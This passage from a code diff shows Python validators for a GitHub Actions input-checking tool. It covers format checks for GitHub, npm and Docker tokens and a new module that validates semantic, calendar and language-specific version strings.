# github_pat_ + 50-255 chars with underscores
"github_fine_grained": r"^github_pat_[A-Za-z0-9_]{50,255}$",
# OAuth access token: gho_ + 36 = 40 chars total
"github_oauth": r"^gho_[a-zA-Z0-9]{36}$",
# User access token for GitHub App:
# ghu_ + 36 = 40 chars total
"github_user_app": r"^ghu_[a-zA-Z0-9]{36}$",
# Installation access token:
# ghs_ + 36 = 40 chars total
"github_installation": r"^ghs_[a-zA-Z0-9]{36}$",
# Refresh token for GitHub App:
# ghr_ + 36 = 40 chars total
"github_refresh": r"^ghr_[a-zA-Z0-9]{36}$",
# GitHub Enterprise token:
# ghe_ + 36 = 40 chars total
"github_enterprise": r"^ghe_[a-zA-Z0-9]{36}$",
# NPM classic tokens
"npm_classic": r"^npm_[a-zA-Z0-9]{40,}$",
}
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate token-related inputs."""
valid = True
for input_name, value in inputs.items():
if "token" in input_name.lower():
# Determine token type from input name
if "npm" in input_name:
valid &= self.validate_npm_token(value, input_name)
elif "dockerhub" in input_name or "docker" in input_name:
valid &= self.validate_docker_token(value, input_name)
else:
# Default to GitHub token
valid &= self.validate_github_token(value)
elif input_name == "password":
# Password fields might be tokens
valid &= self.validate_password(value, input_name)
return valid
def get_required_inputs(self) -> list[str]:
"""Token validators typically don't define required inputs."""
return []
def get_validation_rules(self) -> dict:
"""Return token validation rules."""
return {
"github_token": "GitHub personal access token or ${{ github.token }}",
"npm_token": "NPM authentication token",
"docker_token": "Docker Hub access token",
"patterns": self.TOKEN_PATTERNS,
}
def validate_github_token(self, token: str, *, required: bool = False) -> bool:
"""Validate GitHub token format.
Args:
token: The token to validate
required: Whether the token is required
Returns:
True if valid, False otherwise
"""
if not token or token.strip() == "":
if required:
self.add_error("GitHub token is required but not provided")
return False
return True # Optional token can be empty
# Allow GitHub Actions expressions
if self.is_github_expression(token):
return True
if token == "${{ secrets.GITHUB_TOKEN }}":
return True
# Allow environment variable references
if token.startswith("$") and not token.startswith("${{"):
return True
# Check against known GitHub token patterns
for pattern_name, pattern in self.TOKEN_PATTERNS.items():
if pattern_name.startswith("github_") and re.match(pattern, token):
return True
self.add_error(
"Invalid token format. Expected: ghp_* (40 chars), "
"github_pat_[A-Za-z0-9_]* (50-255 chars), gho_* (40 chars), ghu_* (40 chars), "
"ghs_* (40 chars), ghr_* (40 chars), ghe_* (40 chars), or ${{ github.token }}",
)
return False
def validate_npm_token(self, token: str, name: str = "npm-token") -> bool:
"""Validate NPM token format.
Args:
token: The token to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not token or token.strip() == "":
return True # NPM token is often optional
# Allow environment variable references
if token.startswith("$"):
return True
# Check NPM token pattern
if re.match(self.TOKEN_PATTERNS["npm_classic"], token):
return True
# NPM also accepts UUIDs and other formats
if re.match(
r"^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$",
token,
):
return True
self.add_error(f"Invalid {name} format. Expected npm_* token or UUID format")
return False
def validate_docker_token(self, token: str, name: str = "docker-token") -> bool:
"""Validate Docker Hub token format.
Args:
token: The token to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not token or token.strip() == "":
return True # Docker token is often optional
# Allow environment variable references
if token.startswith("$"):
return True
# Docker tokens are typically UUIDs or custom formats
# We'll be lenient here as Docker Hub accepts various formats
if len(token) < 10:
self.add_error(f"Invalid {name}: token too short")
return False
# Check for obvious security issues
if " " in token or "\n" in token or "\t" in token:
self.add_error(f"Invalid {name}: contains whitespace")
return False
return True
def validate_password(self, password: str, name: str = "password") -> bool:
"""Validate password field (might be a token).
Args:
password: The password/token to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not password or password.strip() == "":
# Password might be required depending on context
return True
# Allow environment variable references
if password.startswith("$"):
return True
# Check for obvious security issues
if len(password) < 8:
self.add_error(f"Invalid {name}: too short (minimum 8 characters)")
return False
# Check for whitespace
if password != password.strip():
self.add_error(f"Invalid {name}: contains leading/trailing whitespace")
return False
return True
def validate_namespace_with_lookahead(self, namespace: str, name: str = "namespace") -> bool:
"""Validate namespace using lookahead pattern (for csharp-publish).
This is a special case for GitHub package namespaces.
Args:
namespace: The namespace to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not namespace or namespace.strip() == "":
self.add_error(f"{name.capitalize()} cannot be empty")
return False
# Original pattern with lookahead: ^[a-zA-Z0-9]([a-zA-Z0-9]|-(?=[a-zA-Z0-9])){0,38}$
# This ensures no trailing hyphens
pattern = r"^[a-zA-Z0-9]([a-zA-Z0-9]|-(?=[a-zA-Z0-9])){0,38}$"
if re.match(pattern, namespace):
return True
self.add_error(
f'Invalid {name} format: "{namespace}". Must be 1-39 characters, '
"alphanumeric and hyphens, no trailing hyphens",
)
return False

606
validate-inputs/validators/version.py Normal file
View File

@@ -0,0 +1,606 @@
"""Version validators for various versioning schemes."""
from __future__ import annotations
import re
from .base import BaseValidator
class VersionValidator(BaseValidator):
"""Validator for version strings (SemVer, CalVer, language-specific)."""
# Common version patterns
VERSION_X_Y_Z_PATTERN = r"^\d+\.\d+(\.\d+)?$"
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate version-related inputs."""
valid = True
for input_name, value in inputs.items():
if "version" in input_name.lower():
# Determine version type from input name
if "dotnet" in input_name:
valid &= self.validate_dotnet_version(value, input_name)
elif "terraform" in input_name or "tflint" in input_name:
valid &= self.validate_terraform_version(value, input_name)
elif "node" in input_name:
valid &= self.validate_node_version(value, input_name)
elif "python" in input_name:
valid &= self.validate_python_version(value, input_name)
elif "php" in input_name:
valid &= self.validate_php_version(value, input_name)
elif "go" in input_name:
valid &= self.validate_go_version(value, input_name)
else:
# Default to semantic version
valid &= self.validate_semantic_version(value, input_name)
return valid
def get_required_inputs(self) -> list[str]:
"""Version validators typically don't define required inputs."""
return []
def get_validation_rules(self) -> dict:
"""Return version validation rules."""
return {
"semantic": "X.Y.Z format with optional pre-release and build metadata",
"calver": "Calendar-based versioning (YYYY.MM.DD, etc.)",
"dotnet": ".NET version format",
"terraform": "Terraform version format",
"node": "Node.js version format",
"python": "Python 3.x version",
"php": "PHP 7.4-9.x version",
"go": "Go 1.x version",
}
def validate_semantic_version(self, version: str, name: str = "version") -> bool:
"""Validate semantic version format.
Args:
version: The version string to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not version or version.strip() == "":
return True # Version is often optional
# Remove 'v' or 'V' prefix if present (case-insensitive)
clean_version = version
if clean_version.lower().startswith("v"):
clean_version = clean_version[1:]
# Examples: 1.0.0, 2.1.3-beta, 3.0.0-rc.1, 1.2.3+20130313144700
semver_pattern = (
r"^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)" # MAJOR.MINOR.PATCH
r"(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)" # Pre-release
r"(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?"
r"(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" # Build metadata
)
if re.match(semver_pattern, clean_version):
return True
# Also allow simple X.Y format for flexibility
simple_pattern = r"^(0|[1-9]\d*)\.(0|[1-9]\d*)$"
if re.match(simple_pattern, clean_version):
return True
# Also allow single digit version (e.g., "1", "2")
single_digit_pattern = r"^(0|[1-9]\d*)$"
if re.match(single_digit_pattern, clean_version):
return True
self.add_error(
f'Invalid semantic version: "{version}" in {name}. '
"Expected format: MAJOR.MINOR.PATCH (e.g., 1.2.3, 2.0.0-beta)",
)
return False
# Compatibility aliases for tests and backward compatibility
def validate_semver(self, version: str, name: str = "version") -> bool:
"""Alias for validate_semantic_version."""
return self.validate_semantic_version(version, name)
def validate_calver(self, version: str, name: str = "version") -> bool:
"""Alias for validate_calver_version."""
return self.validate_calver_version(version, name)
def validate_version(self, version: str, version_type: str, name: str = "version") -> bool:
"""Generic version validation based on type."""
if version_type == "semantic":
return self.validate_semantic_version(version, name)
if version_type == "calver":
return self.validate_calver_version(version, name)
if version_type == "flexible":
return self.validate_flexible_version(version, name)
if version_type == "dotnet":
return self.validate_dotnet_version(version, name)
if version_type == "terraform":
return self.validate_terraform_version(version, name)
if version_type == "node":
return self.validate_node_version(version, name)
if version_type == "python":
return self.validate_python_version(version, name)
if version_type == "php":
return self.validate_php_version(version, name)
if version_type == "go":
return self.validate_go_version(version, name)
# Allow "latest" as special case
if version.strip().lower() == "latest":
return True
# Default to semantic version
return self.validate_semantic_version(version, name) # Version is often optional
def validate_strict_semantic_version(self, version: str, name: str = "version") -> bool:
"""Validate strict semantic version format (X.Y.Z required).
Args:
version: The version string to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not version or version.strip() == "":
self.add_error(f"Version cannot be empty in {name}")
return False
# Allow "latest" as special case
if version.strip().lower() == "latest":
return True
# Remove common prefixes for validation
clean_version = version.lstrip("v")
# Strict semantic version pattern
pattern = r"^\d+\.\d+\.\d+(-[\dA-Za-z.-]+)?(\+[\dA-Za-z.-]+)?$"
if re.match(pattern, clean_version):
return True
self.add_error(
f'Invalid strict semantic version format: "{version}" in {name}. Must be X.Y.Z',
)
return False
def validate_calver_version(self, version: str, name: str = "version") -> bool:
"""Validate CalVer (Calendar Versioning) format.
Args:
version: The version string to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not version or version.strip() == "":
return True # Version is often optional
# Remove common prefixes for validation
clean_version = version.lstrip("v")
# CalVer patterns
calver_patterns = [
r"^\d{4}\.\d{1,2}\.\d{1,2}$", # YYYY.MM.DD
r"^\d{4}\.\d{1,2}\.\d{3,}$", # YYYY.MM.PATCH
r"^\d{4}\.0\d\.0\d$", # YYYY.0M.0D
r"^\d{2}\.\d{1,2}\.\d+$", # YY.MM.MICRO
r"^\d{4}\.\d{1,2}$", # YYYY.MM
r"^\d{4}-\d{2}-\d{2}$", # YYYY-MM-DD
]
for pattern in calver_patterns:
match = re.match(pattern, clean_version)
# Additional validation for date components
if match and self._validate_calver_date_parts(clean_version, pattern):
return True
self.add_error(
f'Invalid CalVer format: "{version}" in {name}. '
"Expected formats like YYYY.MM.DD, YY.MM.MICRO, etc.",
)
return False
def _parse_calver_year(self, year_part: str) -> int | None:
"""Parse year from CalVer version part.
Returns:
Year as integer, or None if not a valid year format
"""
if len(year_part) == 4:
return int(year_part)
if len(year_part) == 2:
# For YY format, assume 2000s
return 2000 + int(year_part)
return None # Not a date-based CalVer
def _is_valid_month(self, month: int) -> bool:
"""Check if month is in valid range (1-12)."""
return 1 <= month <= 12
def _is_leap_year(self, year: int) -> bool:
"""Check if year is a leap year."""
return (year % 4 == 0 and year % 100 != 0) or (year % 400 == 0)
def _get_max_day_for_month(self, month: int, year: int) -> int:
"""Get maximum valid day for given month and year.
Args:
month: Month (1-12)
year: Year (for leap year calculation)
Returns:
Maximum valid day for the month
"""
if month in [4, 6, 9, 11]: # April, June, September, November
return 30
if month == 2: # February
return 29 if self._is_leap_year(year) else 28
return 31 # All other months
def _is_valid_day(self, day: int, month: int, year: int) -> bool:
"""Check if day is valid for the given month and year."""
if not (1 <= day <= 31):
return False
max_day = self._get_max_day_for_month(month, year)
return day <= max_day
def _should_validate_day(self, pattern: str, third_part: str) -> bool:
"""Determine if third part should be validated as a day.
Args:
pattern: The CalVer pattern that matched
third_part: The third part of the version string
Returns:
True if the third part represents a day and should be validated
"""
# YYYY.MM.DD and YYYY-MM-DD formats have day as third part
if r"\d{1,2}$" in pattern or r"\d{2}$" in pattern:
# Check if it looks like a day (1-2 digits)
return third_part.isdigit() and len(third_part) <= 2
# YYYY.MM.PATCH format has patch number (3+ digits), not a day
if r"\d{3,}" in pattern:
return False
# YYYY.0M.0D format is a date format
return r"0\d" in pattern
def _validate_calver_date_parts(self, version: str, pattern: str) -> bool:
"""Validate date components in CalVer version.
Args:
version: The version string to validate
pattern: The regex pattern that matched (helps determine format type)
Returns:
True if date components are valid, False otherwise
"""
# Handle different separators
parts = version.split("-") if "-" in version else version.split(".")
# Need at least year and month
if len(parts) < 2:
return True
# Parse and validate year
year = self._parse_calver_year(parts[0])
if year is None:
return True # Not a date-based CalVer
# Validate month
month = int(parts[1])
if not self._is_valid_month(month):
return False
# Validate day if present and pattern indicates it's a day (not patch number)
if len(parts) >= 3 and self._should_validate_day(pattern, parts[2]):
day = int(parts[2])
if not self._is_valid_day(day, month, year):
return False
return True
def validate_flexible_version(self, version: str, name: str = "version") -> bool:
"""Validate either CalVer or SemVer format.
Args:
version: The version string to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not version or version.strip() == "":
return True # Version is often optional
# Allow "latest" as special case
if version.strip().lower() == "latest":
return True
# Save current errors
original_errors = self.errors.copy()
# Try CalVer first if it looks like CalVer
clean_version = version.lstrip("v")
looks_like_calver = (
re.match(r"^\d{4}\.", clean_version)
or re.match(r"^\d{4}-", clean_version)
or (re.match(r"^\d{2}\.\d", clean_version) and int(clean_version.split(".")[0]) >= 20)
)
if looks_like_calver:
self.errors = []
if self.validate_calver_version(version, name):
self.errors = original_errors
return True
# If it looks like CalVer but fails, don't try SemVer
self.errors = original_errors
self.add_error(f'Invalid CalVer format: "{version}" in {name}')
return False
# Try SemVer
self.errors = []
if self.validate_semantic_version(version, name):
self.errors = original_errors
return True
# Failed both
self.errors = original_errors
self.add_error(
f'Invalid version format: "{version}" in {name}. '
"Expected either CalVer (e.g., 2024.3.1) or SemVer (e.g., 1.2.3)",
)
return False
def validate_dotnet_version(self, value: str, name: str = "dotnet-version") -> bool:
"""Validate .NET version format."""
return self._validate_language_version(
value,
name,
{
"name": ".NET",
"major_range": (3, 20),
"pattern": r"^\d+(\.\d+(\.\d+)?)?(-[\dA-Za-z-]+(\.\dA-Za-z-]+)*)?$",
"check_leading_zeros": True,
},
)
def validate_terraform_version(self, value: str, name: str = "terraform-version") -> bool:
"""Validate Terraform version format."""
if not value or value.strip() == "":
return True
if value.strip().lower() == "latest":
return True
clean_version = value.lstrip("v")
pattern = r"^\d+\.\d+\.\d+(-[\w.-]+)?$"
if re.match(pattern, clean_version):
return True
self.add_error(f'Invalid Terraform version format: "{value}" in {name}')
return False
def validate_node_version(self, value: str, name: str = "node-version") -> bool:
"""Validate Node.js version format."""
if not value or value.strip() == "":
return True
# Check for special Node.js keywords (case-insensitive)
value_lower = value.strip().lower()
node_keywords = ["latest", "lts", "current", "node"]
if value_lower in node_keywords or value_lower.startswith("lts/"):
return True
# Remove v prefix (case-insensitive)
clean_version = value
if clean_version.lower().startswith("v"):
clean_version = clean_version[1:]
pattern = r"^\d+(\.\d+(\.\d+)?)?$"
if re.match(pattern, clean_version):
return True
self.add_error(f'Invalid Node.js version format: "{value}" in {name}')
return False
def validate_python_version(self, value: str, name: str = "python-version") -> bool:
"""Validate Python version format (3.8-3.15)."""
return self._validate_language_version(
value,
name,
{
"name": "Python",
"major_range": 3,
"minor_range": (8, 15),
"pattern": self.VERSION_X_Y_Z_PATTERN,
},
)
def validate_php_version(self, value: str, name: str = "php-version") -> bool:
"""Validate PHP version format (7.4-9.x)."""
# First do basic validation
if not value or value.strip() == "":
self.add_error(f"{name} cannot be empty")
return False
clean_value = value.strip()
# Reject v prefix
if clean_value.startswith("v"):
self.add_error(
f'Invalid PHP version format: "{value}" in {name}. '
'Version prefix "v" is not allowed',
)
return False
# Check format
if not re.match(self.VERSION_X_Y_Z_PATTERN, clean_value):
self.add_error(
f'Invalid PHP version format: "{value}" in {name}. Must be X.Y or X.Y.Z format',
)
return False
# Parse version
parts = clean_value.split(".")
major = int(parts[0])
minor = int(parts[1])
# Check major version range (7-9)
if major < 7 or major > 9:
self.add_error(
f'PHP version "{value}" in {name}. Major version should be between 7 and 9',
)
return False
# Check minor version ranges per major version
# PHP 7: 7.0-7.4 are the only released versions, but allow higher for testing
# PHP 8: Allow any minor version for future compatibility
# PHP 9: Allow any minor for future compatibility
# Only restrict if the minor version is unreasonably high (>99)
if minor > 99:
self.add_error(
f'PHP version "{value}" in {name}. Minor version {minor} is unreasonably high',
)
return False
return True
def validate_go_version(self, value: str, name: str = "go-version") -> bool:
"""Validate Go version format (1.18-1.30)."""
return self._validate_language_version(
value,
name,
{
"name": "Go",
"major_range": 1,
"minor_range": (18, 30),
"pattern": self.VERSION_X_Y_Z_PATTERN,
},
)
def _check_version_prefix(
self, value: str, clean_value: str, name: str, lang_name: str
) -> bool:
"""Check if version has invalid 'v' prefix."""
if clean_value.startswith("v"):
self.add_error(
f'Invalid {lang_name} version format: "{value}" in {name}. '
'Version prefix "v" is not allowed',
)
return False
return True
def _check_version_format(self, value: str, clean_value: str, name: str, config: dict) -> bool:
"""Check if version matches expected format pattern."""
if not re.match(config["pattern"], clean_value):
self.add_error(
f'Invalid {config["name"]} version format: "{value}" in {name}. '
"Must be X.Y or X.Y.Z format",
)
return False
return True
def _check_leading_zeros(self, value: str, parts: list[str], name: str, lang_name: str) -> bool:
"""Check for invalid leading zeros in version parts."""
for part in parts:
if part.startswith("0") and len(part) > 1:
self.add_error(
f'Invalid {lang_name} version format: "{value}" in {name}. '
"Leading zeros are not allowed",
)
return False
return True
def _validate_major_version(
self,
major: int,
value: str,
name: str,
major_range: int | tuple[int, int] | None,
lang_name: str,
) -> bool:
"""Validate major version against allowed range."""
if isinstance(major_range, int):
if major != major_range:
self.add_error(
f'{lang_name} version "{value}" in {name}. '
f"{lang_name} major version should be {major_range}",
)
return False
elif major_range:
min_major, max_major = major_range
if major < min_major or major > max_major:
self.add_error(
f'{lang_name} version "{value}" in {name}. '
f"Major version should be between {min_major} and {max_major}",
)
return False
return True
def _validate_minor_version(
self,
minor: int,
value: str,
name: str,
minor_range: tuple[int, int] | None,
lang_name: str,
) -> bool:
"""Validate minor version against allowed range."""
if minor_range:
min_minor, max_minor = minor_range
if minor < min_minor or minor > max_minor:
self.add_error(
f'{lang_name} version "{value}" in {name}. '
f"Minor version should be between {min_minor} and {max_minor}",
)
return False
return True
def _validate_language_version(self, value: str, name: str, config: dict) -> bool:
"""Consolidated language version validation."""
if not value or value.strip() == "":
if config.get("required", False):
self.add_error(f'Input "{name}" is required and cannot be empty')
return False
return True
clean_value = value.strip()
lang_name = config["name"]
# Check for invalid 'v' prefix
if not self._check_version_prefix(value, clean_value, name, lang_name):
return False
# Check version format matches pattern
if not self._check_version_format(value, clean_value, name, config):
return False
# Parse version components
parts = clean_value.split(".")
major = int(parts[0])
minor = int(parts[1]) if len(parts) > 1 else 0
# Check for leading zeros if required
if config.get("check_leading_zeros") and not self._check_leading_zeros(
value, parts, name, lang_name
):
return False
# Validate major version range
major_valid = self._validate_major_version(
major, value, name, config.get("major_range"), lang_name
)
if not major_valid:
return False
# Validate minor version range
return self._validate_minor_version(
minor, value, name, config.get("minor_range"), lang_name
)